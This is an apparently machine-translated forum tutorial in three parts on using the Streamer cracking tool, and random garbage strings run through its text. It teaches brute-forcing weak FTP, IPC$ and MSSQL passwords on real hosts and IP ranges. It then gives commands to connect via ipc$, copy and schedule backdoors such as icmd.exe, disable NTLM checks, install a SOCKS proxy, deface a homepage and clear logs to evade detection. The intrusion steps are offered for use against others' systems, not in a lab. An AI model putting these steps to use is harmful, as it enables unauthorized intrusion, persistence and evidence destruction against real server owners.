How to use streamer?

Streamer tutorial

Streamer tutorial is ON, Z$G*^ m*U

Many new people don’t know how to start when using streamers, Xiaorong Forums often discuss basic issues like "how to add users" :), so I took some time to write this simple tutorial, hoping to help novices get started quickly. $Xn3l Eamp;e M'fl7I

h4r3|)V"Samp;y

I personally think that streamer cracking can be divided into 5 parts: #?c"J4l'uL ;Mum

nZX'vd;E3D4{ A6g 1. POP3/FTP/... detection

Y D Z"Aw9e

N z*l6A8nuxjAZ 2. IPC detection

v8} ]2i >

4. Advanced scanning 4v`I'\ D\Z \)r x!e-q)j bf

5. Others... 9FZJ-tE6c(} N8v

Q H^ @4VX'p Due to development time, the above detection modes are slightly different, so they are divided into four parts. This tutorial talks about the detection of the first part. The subsequent detection modes should belong to advanced applications of streamers:) Z: BC 1. You must have a streamer. I used streamer 2001.FOR Win98 Chinese version.FOR Win2000 is also available.

Q a: x7c.Kf4u First startup. Streamer, see the interface as shown below: ：x2jWr0nJ x

"d)zkP!\ h$a ]|amp；Q0uro

X-U9[zO"k；M

You need to register for the first time, but don’t think about spending money :), Xiaorong just wants to see how many people use his streamer. You can fill in the corresponding options and click send. If the sending fails, just change the sending server

1Dy*^7CM4y4jj7BA )[sRpa7_/w

S；X j@_H

E U4xtR：@5EYt/CJ)}

Because I have to reinstall the system, I don’t know how many times I have sent it: (. If you don’t want to register, just wait for the progress bar below to finish and click Later That’s it. As shown above:

y\Bs9Np9~9fOl`9F F5OGX-X?3c@U9L

tN; FQDgH-x -s(Z5w5FEr@p[

H9ed$^"N[*P"X .A$}Vtx6q2sJ

2. Find a site, I chose China.com [url]www.china.com[/url] Home page space (home4u.china.com), detection method: FTP.

N |B^Fk4Y I V PASS:) We know that almost all homepages use FTP to upload. This time we will use it to test a bunch of user names to see if there are any weak passwords. Haha, if there is something like hacker.at.china.com, it might as well Take it for yourself:)

4n9N OnqZkd

7W NmEQ5ZHw 3. Add the name of the site to be cracked: right-click the FTP host → Edit → Add → Enter home4u.china.com → Sure! \:] B E'MGw

mZy9yF：qpE8K eJ5L!I a#C4I1O*w

yUamp;CX#X$x,r

CrN Ap

!zS, @}0m/P, V7} 4. Add usernames: What we want to crack is a bunch of usernames, so we need to add a list file of usernames! Let’s add Name.dic under the streamer directory:) Right-click on the host just added: home4u.china.com → Edit → Add from the list → Name.dic → Open

;g$d.k H-W 5itXRHu?8G

7_bvg'fU

Camp;@2H W,]S NOyOw-Y.\*E x hJkB6l

1l;v0{`! ~d ehU u

Then there will be a prompt that "the user already exists in the list", we select "Don't prompt again" → OK. As shown below: 6A ~:uu X3eh

$G7Z~ nw

wVF5^tB#yT#kNf7c

CkjR-X[_@-b Username There are too many, we can use the "-" sign in front of the host to shrink the user list, as shown below:

l3^8TC0R3Ml

7Q, FP oe`"[mk Z- m1x^kB8j$Ej]

!V8WoCEr

Please note that there must be a √ in the small box in front of the name. If not, it will not be detected. Xcj)[ PR

\JL, Password": "123456" and "username" for detection, because such passwords are the most frequently used:) 9r)?e b;M4Y5y#pixy

{M JrO#j@Hmg_ Of course you You can modify this simple mode file and add a password that you think is weak. The method is: click the Tools menu → Mode file setting → Simple mode detection setting file → Add the password you want to add → Save the setting file! OQhI^, O

F Q_~.k ODI Let's take a look at how many of these names use "123456" and "own name" as passwords.

}S~5M{)E

EbUz RqHZ detection → Simple mode detection!

u$b'n(jR,Ik0h@

b(P*|@-s,U!P;uO.{ hm.T2l*t},|

p>

T ]qamp;I2q~

3F_(W(C j?\

M s q O3L$s Detecting...

：fJ A；T@S}amp;u

y g.Bl C-_6x"U@X M1]B

$k.S*q!g.] X

K]e/y^Ii

：]^YE/A$fB#W

1M ]t eW QAM 6. The detection is completed and the results are seen. The streamer will ask us if we want to view the intrusion detection report. If we don't want to see it, we can choose no.

*sQ!cR：C'oms

；w I`amp; p>|I)vh7?xc|

;Hga B5r: vt#Je report screen

2z)S"nS @l4~#VM

ydx!w*O b| {?Cb1ZDZ

\.i c`h xc 7. If you want to detect a user name, you need to add a dictionary or password scheme. The method is: right-click to decode. Dictionary or scheme → Edit → Add → Select a password file. ]}E5? J l/@

J$``IO#R3i The above is a simple detection of streamer. In fact, these are The functions can only be regarded as the functions of Streamer version 2.5. The IPC/SQL/advanced scanning and other functions added by Streamer 2001 make Streamer more powerful. If you are already familiar with this, I believe you will learn it quickly by looking at Streamer's HELP. Other usage methods.

9\W i R-JUV j {L k/X |

Regarding the user name: Some people feel that the user name they added may not exist. , wouldn’t it be a waste of effort if it doesn’t exist? You can rest assured that the streamer will verify it, and there are so many registered users that it’s hard to think of a name that doesn’t exist. If you don’t believe it, just try it.

Vi~PLWdY UYk5@Ou

About the dictionary problem: Streamers can use the dictionary scheme to detect. Of course, you can also generate a dictionary. Some novices don’t know how to do it when practicing. You can also use Notepad to generate it, enter a password for each line, and change the extension to .DIC after saving, and the streamer will recognize it:) If you don’t even know how to change the extension: ( Then...

wp-w7J"Ga)\af p

L/\Di/`@y X#c

2a2H~/f9W[，L o r @m F ~

Everyone will encounter difficulties as long as they study. I also have a lot of problems, and I have to ask Xiaorong and EKIN for advice. Welcome everyone to communicate more:)

]J |3{, mJ -k#j!M

0W HX$sp/@ a

u3I4LS9n btd

P#m)Zqs

`1_s "W)BD:c"{n_amp;r]

To be continued...

Cigarette 2007-5-28 11:07

Streamer Tutorial 2

I haven’t written anything for a long time. This is due to my laziness and lack of passion in life.

The last article in my notepad is full of promises I owe to friends: (

l P8M"F5M: b2|0k !J: Ix~R h

Since you see this Okay, just listen to my complaints:) You should have the right mentality when it comes to security. Don't think that you can achieve success in one step just by knowing how to use a tool.

{B \[y0x\/u 'a g a S )tUc

Communication and learning are the most important. Keep your mentality right, no matter whether we are high or low.

R p4O)Z'qT#L n.Wxu3Zk0x

5F i GX!xJL Z#`dN

What I am going to write about today is the IPC detection of streamer: \,`;P_`?

Ev b n jq 一, Purpose and tasks: @amp;g2Bs/dp i

M UA0P@ O;t pu!?DP

1. Use streamer's IPC detection to obtain the management of an NT host permissions and make this host a springboard/agent

V |nnP;_gTX] 2. Learn the relevant knowledge of IPC detection

!gnaW4v, Ft9~ 4X-. R0J'U: \ |td

2. Detection process:

E], @9y/b Bm#a~ S8HD#?X

1. You must have a streamer. The Chinese version I used for the test here is streamer 2001. FOR Win98 is not possible because the IPC connection function is NT/

X.Q#mG"Vj^S } T!J (U: s, o|P1F\I2p

Function provided by 2000. And streamer FOR 2K requires your operating system to be NT/2000, otherwise the streamer startup will fail!

DfdoX;})J (~\Q.` v \amp;|7\3o

What is IPC:

l2E6WK0@4b^

d, d-Txkrx!miLM IPC refers to "InterProcess Communications", ipc$ to be precise, which is the default admin*** privilege when the system starts. .p gsh Y_E

S#M Y c^. \_|

IPC$ is a unique remote network login function in Windows NT/2K. Its characteristic is that only one connection is allowed between two IPs at the same time (nV6s7f4k

RE u*@!T Note that your attempt to connect via IPC$ will leave a record in the EventLog regardless of whether you logged in successfully. g/?"o[；We AvE w

2\"D，R t6u;z $s e5mP6@^5v7t

：s#n8[q4rA g

Is it possible to brute force password cracking through IPC$? sure ! However, isn't it too stupid...

#p"U`9F9v8lv,P

xK8X$rAm k{8K*G7q5R

2. First startup Streamer, you will see the registration screen. Please refer to my first tutorial for specific operations. We have several methods to pass IPC on the home page

sI)[at

M9ly3t p detects and obtains management permissions. What we need to do here is to get a springboard, so we can use a method with a high hit rate to detect (test a bunch of IPs to get A: q6EkB5_v

nLa5Q*pxL

to weak passwords).

"S[；hr4]W)@

9Q$?5X4w(a Select Detect→Detect POP3/FTP/NT/SQL host option on the main interface, or press Ctrl directly R.

u ~ ]` W6C Figure main1 4HSmP u3`-g

7\0v7S7S^ue

k.h]7}vr4A*| "B^ ; !Y0@ws0r, E 3. Go to the small window above and enter the IP segment we want to crack. Let’s take a look. In Figure main2, we have canceled “Automatically add the FrontPage host to the HTTP host list” because we only have it. I want to obtain a weak IPC password, which can speed up the scanning:) Fill in the IP and choose to scan the NT/98 host k3P.gQ$p

.ZA F#w X 4. Detecting... (start1 ) _, sn#G;q3Y`

!Gv?@G;t0|1t_D

(Note that if you want to detect the domestic IP segment reserved by the streamer, it will be Prohibited, that is, the words "IP Reserved" appear in the information bar during detection) 6rb2ZLn9n'?3F

M.KoJ2c

!dnP6me;DC iCBt)hvs!bm)v

6e(JmneR 5. This is the scanned NT/98 host list: (jg1) 9yd R9V @c E G

4z zC1Kn9GOP?

1sa _W Om9l

'U0x?U mk ^2G5j

6. Common passwords were not scanned: (

2\"r'i'kAamp;n;o 6KgORI"y t}-T$J

HfegS j c，o9v*LQ)K：F

7. Don’t check the report:... amp; e2N(Ki, t \amp ；WM@FO

} z'p-SyYu4W

WU9g._w/S5A

\：kr_8_7gA)A 8. There are a lot of NT/98 The machine is installed, and IPC$ detection is officially started: IPC$ host-detection-detection of all IPC$ user lists $P8E]3\9B K2pg

AP#[(N W5P4Y

n)T h9qOamp;[k"U3y P weak password. Then click options

Y i:~C{DP Nzy _x3wxL

(C0M4X W@vO

"mx-?qz]n4z 10. Click "Options" ": In order to speed up the scanning of weak passwords, we can cancel all two here, such as the one below. If the other party prohibits listing users, I think for a network administrator, the possibility of weak passwords is very slim.

T1@ Z\q _'xbU

3U n)L1?1ZHE0E ]*\9K5\6{4o2{3a l8_W

-~K d6^]w mg x1_fw[

11. Detecting...

L|9Wl/`9i!w

iX5~o5y"E C @ /l8f#OxW：@Q

FL?HKg/vQ

12. There is a password:) vh3tv/zll, p

xm; {Z r L3{~"k

y1pg2x l z: P l(f6y2[2vSY;K,]

13. The window to view the report appears again, take a look:)

#Y0U fH M@, @ Tf x

@^Z0v(t [| 9m-`)X-P(Q#o，I

C8E [，F W

14. There is a remote host The management password is gone. All we have left is to find a way to control it. Is there any good way? :) Yes! Take a look at the tool yourself - i:h0{(AGCO5O

H.j f! .

}6Pb \ u W#C V`*@$m*u"pHamp;P

15. Hack him!

w2K#cu"e }

@2]*w5d.Y V'D8bB Open a dos prompt and execute the following command. The example used this time is as shown below.

1v'kePX4a-r

)z9N, s5hb-AaH_ 1. net use file：//Other ip/ipc$ "password" /user: "username" || Establish a remote connection

6sBdD1z3l p#T(o_p5ve PSqC

2. copy icmd.exe file：//The other party’s ip/admin$ || admin$ is the other party’s winnt directory:) There are many files here.

*Q1T*l，e"K_/E

-Pr：zmOn/L 3. net time file：//Other IP/ || Look at the other party’s local time

{7J{ H.|：f!oy Q\M

R g；Yi}x tO1jamp;_ 4. at file：//The other party’s ip/ time to start the program Program name Parameters for starting the program || Use the at command to start the program regularly. Here we can also use the soon program, which can replace the 3/4 step.

Luw UB @)L2~ fy S0@lz

5. Telnet the other party’s ip port || 1Qamp; LR1Z3W/h }

{K9x J4s-U(KC-_*c

6. Enter pass (if you are not using icmd.exe, or if you have not set a password, you will not need it) ||

8Hv3k?)um1o@~`[ QF@G~gZ8jF

7 , open a window and continue to copy the things we use.

copy sock.exe copy ntlm.exe copy cl.exe clear.exe 1p"? >

-MRgW,~F/cx

q\amp;Vh|,P #oamp;n8N/R` lRB

9O2i,ZZ ~/~,b kAc4f -h!v Q Figure cmd2

Nl#I\*s E V

Ui HR"CX

;L;\#~A-g])_$ o

Z(G;iiC If we really want to hack him, we only need to overwrite the target's homepage with our homepage file. We can pass dir /s default.htm or dir /s index.htm to determine the homepage of the other party, usually at In c:\interpub\wwwroot, like this: copy default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M

_s8c8P\B K

Below The pictures show demonstrations t2~5l: i'v,j

.T'l!h) Everything is there, let's make it a springboard, it will be easier to work in the future:) /S.S,_? ^"L-y

Famp; D(HL ^ Execute the ntlm.exe we copied in the past, and cancel the verification.

Leave yourself a backdoor, such as increasing the guest's permissions, or other backdoor tools. There are many such things, so you can choose from them. Take a look at the pile of things copied by the killer:)

Gk, Q@ X "n\m us E

} ^\W(a G V，S

Y1aU j9t ^/n[7K

6Z`!q!Dx- W\ 8. Make a SOCK5 proxy for fun, it is good to use on QQ: cqamp;Q `k h8m

1G1}lX'S(F

Execute our copy of the past sock - install, net start skserver and see the effect on QQ:)

1C.P7F6?"mY

[7Damp;namp;l|@

*b wh ?}1O/SW

0s(r2G：K9_A\kB/iw Did you not see the above steps clearly? \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN The following are all the commands after I telnet:)

M)M k|.Z $me*bZRZr

0c0Zw8X7}I

$pF g1^.A 9. Can it be made into something else? yLP4s#w"\5i4|

/}2}H6h!jc/|o;A

Of course, as long as you have time and are willing to do it, I once secretly put my homepage on someone else's server. It's fast and has unlimited space. Hehe:)

Aamp;b!W2`My ^#v

5Lj} O`qG 10. Clear logs and disconnect: dB#Va F~w f

"x)Op(r[`9D

Execute our copy of the past cl.exe clear.exe to clear the logs, such as clear all: clear all logs and then disconnect: net use file://ip/ipc$ /delete

FNwL3v

4J$lx'Xztp I think this step is necessary, especially on some controversial sites, or domestic sites, unless you want to report on TV in the XXX area The brave detective captured a mentally retarded hacker named XXX. B#yg3u J#q

amp;u;Y/q~3hN A~ As long as it is studying, everyone will encounter difficulties. I also have a lot of problems. I have to ask Xiaorong and EKIN for advice. Everyone is welcome More exchanges:)

Cigarette 2007-5-28 11:08

Streamer Tutorial 3

I finally finished writing about IPC$, that damn Internet cafe, The noisy sounds are ringing in my ears: (, you may not be able to imagine that I completed the IPC$ detection in an Internet cafe, and that Internet cafe also has a network monitor from the public security department. This thing is very interesting. It seems to be a VXD call and runs with IE libraries integrated together. If I have to do some research one day, maybe a unique Trojan will come out:) PY{ S Fy!Yo

J@2J!QlVW7u;A

No I know if you have any thoughts about flattening me after reading the previous tutorial. . . .

zv'y;w,\!msU

R7dr8gLWpd Communication and learning are the most important. Putting our mentality in the right direction, no matter whether we are high or low.

jN; d|C c|]

\#O"o7Nd

ER[ x`v'r What I am going to write about today is streamer's SQL detection. By the way, ipc$ addendum and other detection methods

sI!\~*F3~

hmw.N Eer-Ca t 1. Purpose and tasks: 1ZCUh!v: @i DZ

/]a E)Z4G#].e

1. Use Streamer's SQL detection to obtain the management rights of an NT host dU/[-d9JI'k

2. Learn the relevant knowledge of SQL detection.

^q$f5F k o;d qJ 3. IPC$ addendum and other...

$n j6n$V yl 2. Detection process. : , y?8gzw)l

, F7ajG@: [ 1. You must have a streamer, no need to say this anymore :) rcHFamp; O4w|C

Ny|f \X

What is SQL:

2?Ek\ Z0G"E \;f"n0Y0? x F^]6~ H9r

SQL: Microsoft The database developed is specially used on Microsoft OS. Its functions are similar to Mysql under Linux. Who is similar to whom? Have time

7K$e.k Jbp (wi4PW6s9pU8e/C*H

Go and read the SQL online manual, it is very clear.

amp;W8A4of)?)t)U

'?c3QW@.k#Dh@ *Ll Network protocols supported by SQL service program: Nl*`yf?

.G0y)?F, R$`rH Named pipes: Use NT SMB port for communication, there is a risk of data intercepted by SNIFFER .

YB5I7`ME E9v4D

-If}ru \ IP Sockets: Port 1433 is opened by default and can be detected by scanners, and there is a risk of data intercepted by SNIFFER.

p>

：b3L{~-S >

JJq(S:o9`\,nk

NWLink: There is a risk of data being intercepted by SNIFFER. 5{/AhH3_F jv*LM

^3qxM8h:\qZ ` W!y!m

AppleTalk (ADSP): There is a risk of data being intercepted by SNIFFERv"t3N"e DZx

7y3r KD UkGZW@ Banyan Vines: There is a risk of data being intercepted by SNIFFER Danger: t k6Z7RZ; W~

Bkh{3_/y9k7D p

On the Internet, more than 95% of SQL Servers use the IP Sockets protocol, and this is what the streamer detects Protocol default port 1433

; MA'vxIjn.L"V7E

([Z8u)b[1N)l[xjf

vI'Go'} dF E q.j 2. We want to obtain the management rights of the SQL host, so we use a method with a high hit rate to detect it (test a bunch of IPs to get weak passwords).

Hz W2VB"Pq

.~8U6@/\?H: { The detection of a fixed host is waiting for my next tutorial:) WUTp!~-M: K

s)XZh4Lz

Select the Detect → Detect POP3/FTP/NT/SQL host option on the main interface, or press Ctrl R ~F)_2mc1J!_2k3o T@

Figure main g;S:]_4M$^

)[MQp j

V_0@sF~

$yX0tZ;TX'l( u(b

I0i)Q2cu2iv/ul

3. Go to the small window below and enter the IP segment we want to crack. We will take a look if you enter it. What is to be detected is the domestic IP segment reserved by the streamer, which will be prohibited, that is, "address reserved information" appears in the information bar during detection)

iO~/qo|p4\ Picture inputip

iO~/qo|p4\ Picture inputip

@, l6S/mi6p, S4^XK-rb

W7i}tF, ?` H B j1jWF：~|;MV

{]-Y;`( wR-[cn 4. Detecting...

5hB-u.aXGA Xb

bm!hl]-Kn|1F5B 5. There is a password:) Picture psss 1→3 amp; I*Xett-^ wY d：N(Q

`, Te`#p` yc2EJ*i7x|Qu'e

t：` V9^]

Ee x-va; W ]F

6uR8p)Crk5\7?

aH0cgLClEGp9I

*{(Samp; hN: n

p>

2H]6I3xJ4V | ip#^/H] My-I g7Z

6. Let’s proceed to obtain the administrator’s permissions 4b.RQK4L

Use. The SQL client connects to the host without SQL installed: (……………… It doesn’t matter, the streamer comes with a connection tool. I used to use Tianxing’s tool SQLexec, but now I don’t need it. A d -i9MC3O!oZ1g

R`s AB$u@A

Open the menu Tools → MSSQL Tools → SQL remote command and take a look:) f8jZ]/J

Graph tools

| q^g{$H|8p6~

D~ fE/Yj'Hyy G4k#X，br(h

sjL t N ]j Figure SQLcmd 7`; ^3d4Kdamp; Wt\4ir2a

@0|#Zh*I`"U

2^M*O8rLD

zL$n*Gl 4nsB*l ?X

7. Obtain administrative rights and add backdoors

s Ex MDamp; zj*y(N Figure cmdline 6R^ {.HtkOe g

5xG7L_ z; LM A

L0Y?2b：sy

8HNh#wk.f

0f-}8s(ZQ gO

{9Rhd aD 8. Now we are administrators:)

3l"eM1G(e.?(U { y.M tn

In the past we used The at command is used to run the program remotely. Today, by the way, I will talk about the "Grower" that comes with the streamer. Take a look at Tools → nt/iis Tools → Grower. Let's use it to remotely start the icmd backdoor.

xW9{5d lp

4o@7Fi.O5Mt{

Picture lookcrop 5q l.c.nM6k

amp;H V} g.e}_O

oS8D'lamp;L

l e9G1a~(wy

图crop amp;V8XM;u }\0t_Sd

{j qEC#?Lc/W

)\$_;k,u-K

H(P1e)G;a7E Figure cropend d'VHG6@yu

m*XX6A$b N fe3A9uB] Sk

-VLFBb*N Log in and see in one minute:

2@'zrwIB.z b9f]V4V/Ys"q#gr2H

-L-e )L，m yQG1?c

@x3A)}U$Ik1mA

.Y，EMOF

6QNC4w6rs't

7O2l (X; TT; bQp

9. Let’s talk about tools → mode file setting → ipc simple setting file.

0T: s(_)^CdaQt

3}.YUYvi)g8N picture mode U k/damp；bcw'e4m

Da \[ j；^2m

8eQI H3er!\$R

H-QJ/njtF#c

#v(HkA{,I9E

@i/V5V`uamp;o Other items in "Tools" and the two mentioned above Similar, not much to say

: AL A"sF)g\ H2K

8{7e(z[(~0j']zF v

#Rn3O${]amp;K"h9v NR 10. Clear the log, disconnect, refer to IPC detection, and remember that you can use the grower to execute commands remotely.

Q]dH Q Of5b ot-m mFnM8a#Cv3A

!oSO.LF|

About IPC$ addendum: After finishing the last article on IPC$ detection, I felt that there was almost nothing left to say:) T) Rlz*v#@gC

b8n2^，y}"Ui1` 1. Although we only detect the weak password of the administrator (admin), in fact, in the real attack, no user password will be detected. Let go of those who try, because we got

E:mJ O#P0M,^EAJ !aF C?5k!qh9CH

Normal user permissions can be elevated. In fact, A normal user's permissions are very important in *nix attacks. lCkc)W@m

MN0f: GTx

2. After obtaining the password, there are various attack methods, don’t be limited to my routine.

XJWu Q |/U5B/Ffco

3. What if the other party does not have XXX? , for this kind of questions, please check out the streamer FAQ I compiled before.

v!D RH z K

'K;t{"S(a?rM

About other detections:

O)},m1]u A1J

]6H {0^7C$?U Play 3389? Lxk8[l8F

Dc?~'^#mQ/c3L l

First of all, the terminal is The function provided by WIN2K, so we must select the "NT/98" host when scanning, and customize the terminal after getting the host list

4]vE0~ b/o CY

6J: XH WY{AN"qu port to scan the 3389 port of these hosts, and then...

7ED.O4CM/]NZ 8l3m-J9x'?*B

Play Playing with cisco router? Y'}L4[x-}：qt

amp;|7l5x\;nm Think about what to do? If you figure it out, you don't need to read my future tutorials:)

4?` [wxXB"o/}~ y!GGM X}\(H: |'`

1_h(r5b"V1E3ht]j

G6RK^XE-u Do you understand? What I mean is to use the streamer flexibly:)